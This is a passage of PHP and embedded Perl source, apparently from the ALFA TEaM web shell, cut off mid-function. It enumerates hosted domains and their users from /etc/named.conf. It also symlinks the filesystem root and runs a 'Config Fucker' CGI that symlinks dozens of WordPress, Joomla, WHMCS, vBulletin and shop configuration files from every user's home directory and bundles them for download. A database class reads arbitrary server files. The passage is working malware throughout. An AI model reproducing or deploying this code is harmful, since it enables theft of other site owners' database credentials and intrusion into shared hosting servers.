2830. echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,\'website\',null)">| Domains(Cpanel) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'whole\')">| Whole Symlink(Cpanel) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,null,null,\'direct\')">| Whole Symlink(Direct-Admin) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,\'config\')">| Config Symlink | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,null,\'cfucker\')">| Config Fucker | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,null,null,null,null,\'userpl\')">| Get User With Perl | </a></h3></center>';
2831. if(isset($_POST['alfa8']) && $_POST['alfa8']=='userpl'){ @mkdir('cgialfa',0755);
2832. @chdir('cgialfa');
2833. alfacgihtaccess('cgi');
2834. $solevisible3 = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'print "Content-type: text/html\n\n";
2835. print\'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Language" content="en-us" /><meta http-equiv="Content-Type" content="text/html;
2836. charset=utf-8" /><title>.::Solevsible GET-User&domain Sheller::.</title><style type="text/css">.newStyle1 {background-color: #000000;
2837. font-family: "Courier New", Courier, monospace;
2838. font-size: large;
2839. font-weight: bold;
2840. }.style1 {text-align: center;
2841. color:#ffffff;
2842. text-decoration:none;
2843. -moz-transition: all 0.3s ease-out;
2844. -o-transition: all 0.3s ease-out;
2845. -webkit-transition: all 0.3s ease-out;
2846. transition: all 0.3s ease-out}.style1:hover {text-align: center;
2847. color:#ff0000;
2848. text-decoration:none;
2849. }</style></head><body class="newStyle1">\';
2850. open (d0mains, \'/etc/named.conf\') or $err=1;
2851. @kr = <d0mains>;
2852. close d0mains;
2853. if ($err){print (\'<p class="style1">&nbsp;
2854. </p><p class="style1">C0uldn\\\'t Bypass it , Sorry</p>\');
2855. die();
2856. }else{print \'<p class="style1">&nbsp;
2857. </p><p class="style1"><b><big><font color="red">Coded By </font><font color="green">Sole Sad & Invisible</font></b></big><br><br> <font color="red"><b><big>Contact : </b></big></font><font color="green"><b><big>solevisible@gmail.com</b></big></font><br><br><font color="gold">Here Is All Domins & Users :</font></p>\';
2858. }foreach my $one (@kr){if($one =~ m/.*?zone "(.*?)" {/){$filename= "/etc/valiases/".$1;
2859. $owner = getpwuid((stat($filename))[4]);
2860. print \'<p class="style1">\'.$1.\' : \'.$owner.\'</p>\';
2861. }}print\'</body></html>\';
2862. ';
2863. @__write_file('user.alfa',$solevisible3);
2864. @chmod('user.alfa',0755);
2865. echo __pre();
2866. echo AlfaiFrameCreator('cgialfa/user.alfa');
2867. } if(isset($_POST['alfa5']) && $_POST['alfa5']=='cfucker'){ @mkdir('cgialfa',0755);
2868. @chdir('cgialfa');
2869. alfacgihtaccess('cgi');
2870. $solevisible3='#!/usr/bin/perl -I/usr/local/bandmin'."\n".'print "Content-type: text/html\n\n";
2871. print\'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Language" content="en-us" /><meta http-equiv="Content-Type" content="text/html;
2872. charset=utf-8" /><title>Solevisible Config Fucker</title><style type="text/css">.solevisible {font-family: Tahoma;
2873. font-size: 14px;
2874. font-weight: bold;
2875. color: #3333ff;
2876. text-align: center;
2877. text-shadow: black 0px 0px 2px;
2878. }#checkouttextarea {webkit-border-radius: 15px;
2879. }</style></head>\';
2880. sub lil{($user) = @_;
2881. $msr = qx{pwd};
2882. $kola=$msr."/".$user;
2883. $kola=~s/\n//g;
2884. symlink(\'/home/\'.$user.\'/public_html/includes/configure.php\',$kola.\'-shop.txt\');
2885. symlink(\'/home/\'.$user.\'/public_html/os/includes/configure.php\',$kola.\'-shop-os.txt\');
2886. symlink(\'/home/\'.$user.\'/public_html/oscom/includes/configure.php\',$kola.\'-oscom.txt\');
2887. symlink(\'/home/\'.$user.\'/public_html/oscommerce/includes/configure.php\',$kola.\'-oscommerce.txt\');
2888. symlink(\'/home/\'.$user.\'/public_html/oscommerces/includes/configure.php\',$kola.\'-oscommerces.txt\');
2889. symlink(\'/home/\'.$user.\'/public_html/shop/includes/configure.php\',$kola.\'-shop2.txt\');
2890. symlink(\'/home/\'.$user.\'/public_html/shopping/includes/configure.php\',$kola.\'-shop-shopping.txt\');
2891. symlink(\'/home/\'.$user.\'/public_html/sale/includes/configure.php\',$kola.\'-sale.txt\');
2892. symlink(\'/home/\'.$user.\'/public_html/amember/config.inc.php\',$kola.\'-amember.txt\');
2893. symlink(\'/home/\'.$user.\'/public_html/config.inc.php\',$kola.\'-amember2.txt\');
2894. symlink(\'/home/\'.$user.\'/public_html/members/configuration.php\',$kola.\'-members.txt\');
2895. symlink(\'/home/\'.$user.\'/public_html/config.php\',$kola.\'-2.txt\');
2896. symlink(\'/home/\'.$user.\'/public_html/forum/includes/config.php\',$kola.\'-forum.txt\');
2897. symlink(\'/home/\'.$user.\'/public_html/forums/includes/config.php\',$kola.\'-forums.txt\');
2898. symlink(\'/home/\'.$user.\'/public_html/admin/conf.php\',$kola.\'-5.txt\');
2899. symlink(\'/home/\'.$user.\'/public_html/admin/config.php\',$kola.\'-4.txt\');
2900. symlink(\'/home/\'.$user.\'/public_html/wp-config.php\',$kola.\'-wp13.txt\');
2901. symlink(\'/home/\'.$user.\'/public_html/wp/wp-config.php\',$kola.\'-wp13-wp.txt\');
2902. symlink(\'/home/\'.$user.\'/public_html/WP/wp-config.php\',$kola.\'-wp13-WP.txt\');
2903. symlink(\'/home/\'.$user.\'/public_html/wp/beta/wp-config.php\',$kola.\'-wp13-wp-beta.txt\');
2904. symlink(\'/home/\'.$user.\'/public_html/beta/wp-config.php\',$kola.\'-wp13-beta.txt\');
2905. symlink(\'/home/\'.$user.\'/public_html/press/wp-config.php\',$kola.\'-wp13-press.txt\');
2906. symlink(\'/home/\'.$user.\'/public_html/wordpress/wp-config.php\',$kola.\'-wp13-wordpress.txt\');
2907. symlink(\'/home/\'.$user.\'/public_html/Wordpress/wp-config.php\',$kola.\'-wp13-Wordpress.txt\');
2908. symlink(\'/home/\'.$user.\'/public_html/wordpress/beta/wp-config.php\',$kola.\'-wp13-wordpress-beta.txt\');
2909. symlink(\'/home/\'.$user.\'/public_html/news/wp-config.php\',$kola.\'-wp13-news.txt\');
2910. symlink(\'/home/\'.$user.\'/public_html/new/wp-config.php\',$kola.\'-wp13-new.txt\');
2911. symlink(\'/home/\'.$user.\'/public_html/blog/wp-config.php\',$kola.\'-wp-blog.txt\');
2912. symlink(\'/home/\'.$user.\'/public_html/beta/wp-config.php\',$kola.\'-wp-beta.txt\');
2913. symlink(\'/home/\'.$user.\'/public_html/blogs/wp-config.php\',$kola.\'-wp-blogs.txt\');
2914. symlink(\'/home/\'.$user.\'/public_html/home/wp-config.php\',$kola.\'-wp-home.txt\');
2915. symlink(\'/home/\'.$user.\'/public_html/protal/wp-config.php\',$kola.\'-wp-protal.txt\');
2916. symlink(\'/home/\'.$user.\'/public_html/site/wp-config.php\',$kola.\'-wp-site.txt\');
2917. symlink(\'/home/\'.$user.\'/public_html/main/wp-config.php\',$kola.\'-wp-main.txt\');
2918. symlink(\'/home/\'.$user.\'/public_html/test/wp-config.php\',$kola.\'-wp-test.txt\');
2919. symlink(\'/home/\'.$user.\'/public_html/conf_global.php\',$kola.\'-6.txt\');
2920. symlink(\'/home/\'.$user.\'/public_html/include/db.php\',$kola.\'-7.txt\');
2921. symlink(\'/home/\'.$user.\'/public_html/connect.php\',$kola.\'-8.txt\');
2922. symlink(\'/home/\'.$user.\'/public_html/mk_conf.php\',$kola.\'-9.txt\');
2923. symlink(\'/home/\'.$user.\'/public_html/include/config.php\',$kola.\'-12.txt\');
2924. symlink(\'/home/\'.$user.\'/public_html/joomla/configuration.php\',$kola.\'-joomla2.txt\');
2925. symlink(\'/home/\'.$user.\'/public_html/protal/configuration.php\',$kola.\'-joomla-protal.txt\');
2926. symlink(\'/home/\'.$user.\'/public_html/joo/configuration.php\',$kola.\'-joo.txt\');
2927. symlink(\'/home/\'.$user.\'/public_html/cms/configuration.php\',$kola.\'-joomla-cms.txt\');
2928. symlink(\'/home/\'.$user.\'/public_html/site/configuration.php\',$kola.\'-joomla-site.txt\');
2929. symlink(\'/home/\'.$user.\'/public_html/main/configuration.php\',$kola.\'-joomla-main.txt\');
2930. symlink(\'/home/\'.$user.\'/public_html/news/configuration.php\',$kola.\'-joomla-news.txt\');
2931. symlink(\'/home/\'.$user.\'/public_html/new/configuration.php\',$kola.\'-joomla-new.txt\');
2932. symlink(\'/home/\'.$user.\'/public_html/home/configuration.php\',$kola.\'-joomla-home.txt\');
2933. symlink(\'/home/\'.$user.\'/public_html/vb/includes/config.php\',$kola.\'-vb.txt\');
2934. symlink(\'/home/\'.$user.\'/public_html/vb3/includes/config.php\',$kola.\'-vb3.txt\');
2935. symlink(\'/home/\'.$user.\'/public_html/includes/config.php\',$kola.\'-includes-vb.txt\');
2936. symlink(\'/home/\'.$user.\'/public_html/whm/configuration.php\',$kola.\'-whm15.txt\');
2937. symlink(\'/home/\'.$user.\'/public_html/central/configuration.php\',$kola.\'-whm-central.txt\');
2938. symlink(\'/home/\'.$user.\'/public_html/whm/whmcs/configuration.php\',$kola.\'-whm-whmcs.txt\');
2939. symlink(\'/home/\'.$user.\'/public_html/whm/WHMCS/configuration.php\',$kola.\'-whm-WHMCS.txt\');
2940. symlink(\'/home/\'.$user.\'/public_html/whmc/WHM/configuration.php\',$kola.\'-whmc-WHM.txt\');
2941. symlink(\'/home/\'.$user.\'/public_html/whmcs/configuration.php\',$kola.\'-whmcs.txt\');
2942. symlink(\'/home/\'.$user.\'/public_html/support/configuration.php\',$kola.\'-support.txt\');
2943. symlink(\'/home/\'.$user.\'/public_html/supp/configuration.php\',$kola.\'-supp.txt\');
2944. symlink(\'/home/\'.$user.\'/public_html/secure/configuration.php\',$kola.\'-sucure.txt\');
2945. symlink(\'/home/\'.$user.\'/public_html/secure/whm/configuration.php\',$kola.\'-sucure-whm.txt\');
2946. symlink(\'/home/\'.$user.\'/public_html/secure/whmcs/configuration.php\',$kola.\'-sucure-whmcs.txt\');
2947. symlink(\'/home/\'.$user.\'/public_html/cpanel/configuration.php\',$kola.\'-cpanel.txt\');
2948. symlink(\'/home/\'.$user.\'/public_html/panel/configuration.php\',$kola.\'-panel.txt\');
2949. symlink(\'/home/\'.$user.\'/public_html/host/configuration.php\',$kola.\'-host.txt\');
2950. symlink(\'/home/\'.$user.\'/public_html/hosting/configuration.php\',$kola.\'-hosting.txt\');
2951. symlink(\'/home/\'.$user.\'/public_html/hosts/configuration.php\',$kola.\'-hosts.txt\');
2952. symlink(\'/home/\'.$user.\'/public_html/configuration.php\',$kola.\'-joomla.txt\');
2953. symlink(\'/home/\'.$user.\'/public_html/submitticket.php\',$kola.\'-whmcs2.txt\');
2954. symlink(\'/home/\'.$user.\'/public_html/clients/configuration.php\',$kola.\'-clients.txt\');
2955. symlink(\'/home/\'.$user.\'/public_html/client/configuration.php\',$kola.\'-client.txt\');
2956. symlink(\'/home/\'.$user.\'/public_html/clientes/configuration.php\',$kola.\'-clientes.txt\');
2957. symlink(\'/home/\'.$user.\'/public_html/cliente/configuration.php\',$kola.\'-client.txt\');
2958. symlink(\'/home/\'.$user.\'/public_html/clientsupport/configuration.php\',$kola.\'-clientsupport.txt\');
2959. symlink(\'/home/\'.$user.\'/public_html/billing/configuration.php\',$kola.\'-billing.txt\');
2960. symlink(\'/home/\'.$user.\'/public_html/manage/configuration.php\',$kola.\'-whm-manage.txt\');
2961. symlink(\'/home/\'.$user.\'/public_html/my/configuration.php\',$kola.\'-whm-my.txt\');
2962. symlink(\'/home/\'.$user.\'/public_html/myshop/configuration.php\',$kola.\'-whm-myshop.txt\');
2963. symlink(\'/home/\'.$user.\'/public_html/includes/dist-configure.php\',$kola.\'-zencart.txt\');
2964. symlink(\'/home/\'.$user.\'/public_html/zencart/includes/dist-configure.php\',$kola.\'-shop-zencart.txt\');
2965. symlink(\'/home/\'.$user.\'/public_html/shop/includes/dist-configure.php\',$kola.\'-shop-ZCshop.txt\');
2966. symlink(\'/home/\'.$user.\'/public_html/Settings.php\',$kola.\'-smf.txt\');
2967. symlink(\'/home/\'.$user.\'/public_html/smf/Settings.php\',$kola.\'-smf2.txt\');
2968. symlink(\'/home/\'.$user.\'/public_html/forum/Settings.php\',$kola.\'-smf-forum.txt\');
2969. symlink(\'/home/\'.$user.\'/public_html/forums/Settings.php\',$kola.\'-smf-forums.txt\');
2970. symlink(\'/home/\'.$user.\'/public_html/upload/includes/config.php\',$kola.\'-up.txt\');
2971. symlink(\'/home/\'.$user.\'/public_html/up/includes/config.php\',$kola.\'-up2.txt\');
2972. }if ($ENV{\'REQUEST_METHOD\'} eq \'POST\') {read(STDIN, $buffer, $ENV{\'CONTENT_LENGTH\'});
2973. } else {$buffer = $ENV{\'QUERY_STRING\'};
2974. }@pairs = split(/&/, $buffer);
2975. foreach $pair (@pairs) {($name, $value) = split(/=/, $pair);
2976. $name =~ tr/+/ /;
2977. $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
2978. $value =~ tr/+/ /;
2979. $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
2980. $FORM{$name} = $value;
2981. }if ($FORM{pass} eq ""){print \'<body class="solevisible" bgcolor="#000000"><p>Solevisible[ALFA TEaM] Config Fucker</p><p>solevisible[at]gmail.com</p><span><font color="red">note:</font> enter passwd=> <font color="#FFFFFF">cat /etc/passwd</font></span><br /><br /><form method="post"><strong><textarea id="checkouttextarea" name="pass" style="border:3px dotted #FF0000;
2982. width: 498px;
2983. height: 370px;
2984. background-color:#FFFFFF;
2985. font-family:Tahoma;
2986. font-size:9pt;
2987. color: black" ></textarea><br />&nbsp;
2988. <p><input name="tar" type="text" style="border:3px dotted #FF0000;
2989. width: 212px;
2990. background-color:#FFFFFF;
2991. font-family:Tahoma;
2992. font-size:8pt;
2993. color:black;
2994. " /><br />&nbsp;
2995. </p><p><input name="Submit1" type="submit" value="Config Get" style="border:3px dotted #FF0000;
2996. width: 99;
2997. font-family:Tahoma;
2998. font-size:10pt;
2999. color: black;
3000. text-transform:uppercase;
3001. height:23;
3002. background-color:#FFFFFF;
3003. " /></p></form></strong>\';
3004. }else{@lines =<$FORM{pass}>;
3005. $y = @lines;
3006. open (MYFILE, ">tar.tmp");
3007. print MYFILE "tar -czf ".$FORM{tar}.".tar ";
3008. for ($ka=0;
3009. $ka<$y;
3010. $ka++){while(@lines[$ka] =~ m/(.*?):x:/g){&lil($1);
3011. print MYFILE $1.".txt ";
3012. for($kd=1;
3013. $kd<18;
3014. $kd++){print MYFILE $1.$kd.".txt ";
3015. }}}print\'<body class="solevisible" bgcolor="#000000"><h2>completed :)</h2><p>&nbsp;
3016. </p>\';
3017. if($FORM{tar} ne ""){open(INFO, "tar.tmp");
3018. @lines =<INFO> ;
3019. close(INFO);
3020. system(@lines);
3021. print\'<p><a href="\'.$FORM{tar}.\'.tar"><font color="#00FF00"><span style="text-decoration: none">Click Here To Download Tar File</span></font></a></p>\';
3022. }}print "</body></html>";
3023. ';
3024. @__write_file('config.alfa',$solevisible3);
3025. @chmod('config.alfa',0755);
3026. echo __pre();
3027. echo AlfaiFrameCreator('cgialfa/config.alfa');
3028. } if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){ if(function_exists('symlink')){ AlfaNum(9,10);
3029. echo __pre().'
3030. <center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);
3031. return false;
3032. " method="post">
3033. <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
3034. <input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
3035. <p><input type="submit" value=" " name="symlink" /></p></form></center>';
3036. @mkdir('sym',0777);
3037. alfacgihtaccess('sym','sym/');
3038. $solevisible56 = $_POST['alfa5'];
3039. $solevisible57 = $_POST['alfa6'];
3040. $solevisible58 = $_POST['alfa7'];
3041. if($solevisible58){ @symlink("$solevisible56","sym/$solevisible57");
3042. echo __pre();
3043. echo '<center><b><font color="white">Click >> </font><a target="_blank" href="sym/'.$solevisible57.'" ><b><font size="4">'.$solevisible57.'</font></b></a></b></center>';
3044. } }else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
3045. } } if(isset($_POST['alfa1']) && $_POST['alfa1']=='website'){ if(!@file_exists("/etc/virtual/domainowners")){ echo "<center>";
3046. $d0mains = @file("/etc/named.conf");
3047. if(!$d0mains){ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>";
3048. } echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table align='center' width='40%' class='main' border='1'><td><font color=\"#00A220\"><b><center># Count</center></font></b></td><td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td><td><font color=\"#FF0000\"><b><center>Users</center></font></b></td>";
3049. $count=1;
3050. if($d0mains){ foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains);
3051. flush();
3052. if(strlen(trim($domains[1][0])) > 2){ $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3053. echo "<tr><td><b><font color=\"#00A220\">".$count."</b></font></td><td><a href=http://www.".$domains[1][0]."/><font color=\"#FFFFFF\"><b>".$domains[1][0]."</font></b></a></td><td><b><font color=\"#FF0000\">".$user['name']."</font></b></td></tr>";
3054. flush();
3055. $count++;
3056. }}}} echo "</center></table>";
3057. }else{echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b> ';
3058. } } if(isset($_POST['alfa2']) && $_POST['alfa2']=='whole'){ if(!@file_exists("/etc/virtual/domainowners")){ @set_time_limit(0);
3059. echo "<center>";
3060. if(function_exists('symlink')){ @mkdir('sym',0777);
3061. alfacgihtaccess('sym','sym/');
3062. @symlink('/','sym/root');
3063. $solevisible9 = @file('/etc/named.conf');
3064. if(!$solevisible9){ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>";
3065. }else{ echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
3066. echo "<table align='center' width='40%' class='main' border='1'>
3067. <td><font color=\"#FFFF01\"><b><center># Count</center></font></b></td>
3068. <td><font color=\"#00A220\"><b><center>Domains</center></font></b></td>
3069. <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
3070. <td><font color=\"#FF0000\"><b><center>symlink</center></font></b></td>";
3071. $count=1;
3072. foreach($solevisible9 as $solevisible13){ if(@eregi('zone',$solevisible13)){ preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
3073. flush();
3074. if(strlen(trim($solevisible14[1][0])) >2){ $solevisible18 = @posix_getpwuid(@fileowner('/etc/valiases/'.$solevisible14[1][0]));
3075. $solevisible21 = $solevisible18['name'];
3076. @symlink('/','sym/root');
3077. $solevisible21 = $solevisible14[1][0];
3078. $solevisible20 = '\.ir';
3079. $solevisible19 = '\.il';
3080. if (@eregi("$solevisible20",$solevisible14[1][0]) or @eregi("$solevisible19",$solevisible14[1][0]) ){ $solevisible21 = "<b><font color=\"#00FFFF\">".$solevisible14[1][0].'</font></b>';
3081. } echo "<tr><td><font color=\"#FFFF01\">{$count}</font></td><td><a target='_blank' href=http://www.".$solevisible14[1][0].'/><font color=\"#00A220\"><b>'.$solevisible21.'</b> </a></font></td><td><font color="white"><b>'.$solevisible18['name']."</font></b></td><td><a href='sym/root/home/".$solevisible18['name']."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";
3082. flush();
3083. $count++;
3084. }}}} }else{ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
3085. } }else {echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b> ';
3086. } echo "</center></table>";
3087. } if(isset($_POST['alfa6']) && $_POST['alfa6']=='direct'){ if(@file_exists("/etc/virtual/domainowners")){ if(function_exists('sysmlink')){ @mkdir('sym',0777);
3088. alfacgihtaccess('sym','sym/');
3089. @symlink('/','sym/root');
3090. fclose($solevisible10);
3091. $sole = @file("/etc/virtual/domainowners");
3092. $count=1;
3093. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
3094. echo "<table align='center' width='40%' class='main' border='1'>
3095. <td><font color=\"#FFFF01\"><b><center># Count</center></font></b></td>
3096. <td><font color=\"#00A220\"><b><center>Domains</center></font></b></td>
3097. <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
3098. <td><font color=\"#FF0000\"><b><center>symlink</center></font></b></td>";
3099. foreach($sole as $visible){ if(@eregi(":",$visible)){ $solevisible = explode(':', $visible);
3100. echo "<tr><td><font color=\"#FFFF01\">{$count}</font></td><td><a target='_blank' href=http://www.".trim($solevisible[0]).'/><font color=\"#00A220\"><b>'.trim($solevisible[0]).'</b> </font></a></td><td><font color="white"><b>'.trim($solevisible[1])."</font></b></td><td><a href='sym/root/home/".trim($solevisible[1])."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";
3101. flush();
3102. $count++;
3103. }}echo "</table>";
3104. }else{ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
3105. } }else{echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
3106. }} if(isset($_POST['alfa3']) && $_POST['alfa3']=='config'){ echo "<center>";
3107. if(function_exists('symlink')){ @mkdir('sym',0777);
3108. alfacgihtaccess('sym','sym/');
3109. @symlink('/','sym/root');
3110. $solevisible9 = @file('/etc/named.conf');
3111. if(!$solevisible9) { echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>";
3112. } else { echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>
3113. <table align='center' width='40%' class='main' ><td><b><font color=\"#FFFFFF\"><center> Domains <b></font></center></td><td> <b><font color=\"#FFFFFF\">Script <b></font></center></td>";
3114. foreach($solevisible9 as $solevisible13){ if(@eregi('zone',$solevisible13)){ preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
3115. flush();
3116. if(strlen(trim($solevisible14[1][0]))>2){ $solevisible18 = @posix_getpwuid(@fileowner('/etc/valiases/'.$solevisible14[1][0]));
3117. $solevisible15=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/wp-config.php';
3118. $solevisible33=get_headers($solevisible15);
3119. $solevisible17=$solevisible33[0];
3120. $solevisible34=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/blog/wp-config.php';
3121. $solevisible35=get_headers($solevisible34);
3122. $solevisible36=$solevisible35[0];
3123. $solevisible37=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/configuration.php';
3124. $solevisible38=get_headers($solevisible37);
3125. $solevisible28=$solevisible38[0];
3126. $solevisible29=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/joomla/configuration.php';
3127. $solevisible30=get_headers($solevisible29);
3128. $solevisible27=$solevisible30[0];
3129. $solevisible31=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/includes/config.php';
3130. $solevisible32=get_headers($solevisible31);
3131. $solevisible26=$solevisible32[0];
3132. $solevisible25=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/vb/includes/config.php';
3133. $solevisible39=get_headers($solevisible25);
3134. $solevisible40=$solevisible39[0];
3135. $solevisible24=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/forum/includes/config.php';
3136. $solevisible23=get_headers($solevisible24);
3137. $solevisible22=$solevisible23[0];
3138. $solevisible41=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'public_html/clients/configuration.php';
3139. $solevisible42=get_headers($solevisible41);
3140. $solevisible43=$solevisible42[0];
3141. $solevisible44=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/support/configuration.php';
3142. $solevisible42=get_headers($solevisible44);
3143. $solevisible45=$solevisible42[0];
3144. $solevisible46=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/client/configuration.php';
3145. $solevisible47=get_headers($solevisible46);
3146. $solevisible48=$solevisible47[0];
3147. $solevisible49=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/submitticket.php';
3148. $solevisible50=get_headers($solevisible49);
3149. $solevisible51=$solevisible50[0];
3150. $solevisible52=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/client/configuration.php';
3151. $solevisible53=get_headers($solevisible52);
3152. $solevisible54=$solevisible53[0];
3153. $solevisible54 = strpos($solevisible17,'200');
3154. $solevisible16='&nbsp;
3155. ';
3156. if (strpos($solevisible17,'200') == true ) { $solevisible16="<a href='".$solevisible15."' target='_blank'>Wordpress</a>";
3157. } elseif (strpos($solevisible36,'200') == true) { $solevisible16="<a href='".$solevisible34."' target='_blank'>Wordpress</a>";
3158. } elseif (strpos($solevisible28,'200') == true and strpos($solevisible51,'200') == true ) { $solevisible16=" <a href='".$solevisible49."' target='_blank'>WHMCS</a>";
3159. } elseif (strpos($solevisible45,'200') == true) { $solevisible16 =" <a href='".$solevisible44."' target='_blank'>WHMCS</a>";
3160. } elseif (strpos($solevisible48,'200') == true) { $solevisible16 =" <a href='".$solevisible46."' target='_blank'>WHMCS</a>";
3161. } elseif (strpos($solevisible28,'200') == true) { $solevisible16=" <a href='".$solevisible37."' target='_blank'>Joomla</a>";
3162. } elseif (strpos($solevisible27,'200') == true) { $solevisible16=" <a href='".$solevisible29."' target='_blank'>Joomla</a>";
3163. } elseif (strpos($solevisible26,'200') == true) { $solevisible16=" <a href='".$solevisible31."' target='_blank'>vBulletin</a>";
3164. } elseif (strpos($solevisible40,'200') == true) { $solevisible16=" <a href='".$solevisible25."' target='_blank'>vBulletin</a>";
3165. } elseif (strpos($solevisible22,'200') == true) { $solevisible16=" <a href='".$solevisible24."' target='_blank'>vBulletin</a>";
3166. } else { continue;
3167. } $solevisible21 = $solevisible18['name'] ;
3168. echo '<tr><td><a href=http://www.'.$solevisible14[1][0].'/>'.$solevisible14[1][0].'</a></td>
3169. <td>'.$solevisible16.'</td></tr>';
3170. flush();
3171. } } } } echo "</center></table>";
3172. }else{echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
3173. } } echo "</div>";
3174. alfafooter();
3175. } function alfasql(){ class DbClass{ var $type;
3176. var $link;
3177. var $res;
3178. function DbClass($type) { $this->type = $type;
3179. } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
3180. break;
3181. case 'pgsql': $host = explode(':', $host);
3182. if(!$host[1]) $host[1]=5432;
3183. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
3184. break;
3185. } return false;
3186. } function selectdb($db){ switch($this->type){ case 'mysql': if(@mysqli_select_db($db))return true;
3187. break;
3188. } return false;
3189. } function query($str){ switch($this->type){ case 'mysql': return $this->res = @mysqli_query($this->link,$str);
3190. break;
3191. case 'pgsql': return $this->res = @pg_query($this->link,$str);
3192. break;
3193. } return false;
3194. } function fetch(){ $res = func_num_args()?func_get_arg(0):$this->res;
3195. switch($this->type){ case 'mysql': return @mysqli_fetch_assoc($res);
3196. break;
3197. case 'pgsql': return @pg_fetch_assoc($res);
3198. break;
3199. } return false;
3200. } function listDbs(){ switch($this->type){ case 'mysql': return $this->query("SHOW databases");
3201. break;
3202. case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
3203. break;
3204. } return false;
3205. } function listTables(){ switch($this->type){ case 'mysql': return $this->res = $this->query('SHOW TABLES');
3206. break;
3207. case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
3208. break;
3209. } return false;
3210. } function error(){ switch($this->type){ case 'mysql': return @mysqli_error($this->link);
3211. break;
3212. case 'pgsql': return @pg_last_error();
3213. break;
3214. } return false;
3215. } function setCharset($str){ switch($this->type){ case 'mysql': if(function_exists('mysql_set_charset')) return @mysqli_set_charset($this->link,$str);
3216. else $this->query('SET CHARSET '.$str);
3217. break;
3218. case 'pgsql': return @pg_set_client_encoding($this->link, $str);
3219. break;
3220. } return false;
3221. } function loadFile($str){ switch($this->type){ case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
3222. break;
3223. case 'pgsql': $this->query("CREATE TABLE solevisible(file text);
3224. COPY solevisible FROM '".addslashes($str)."';
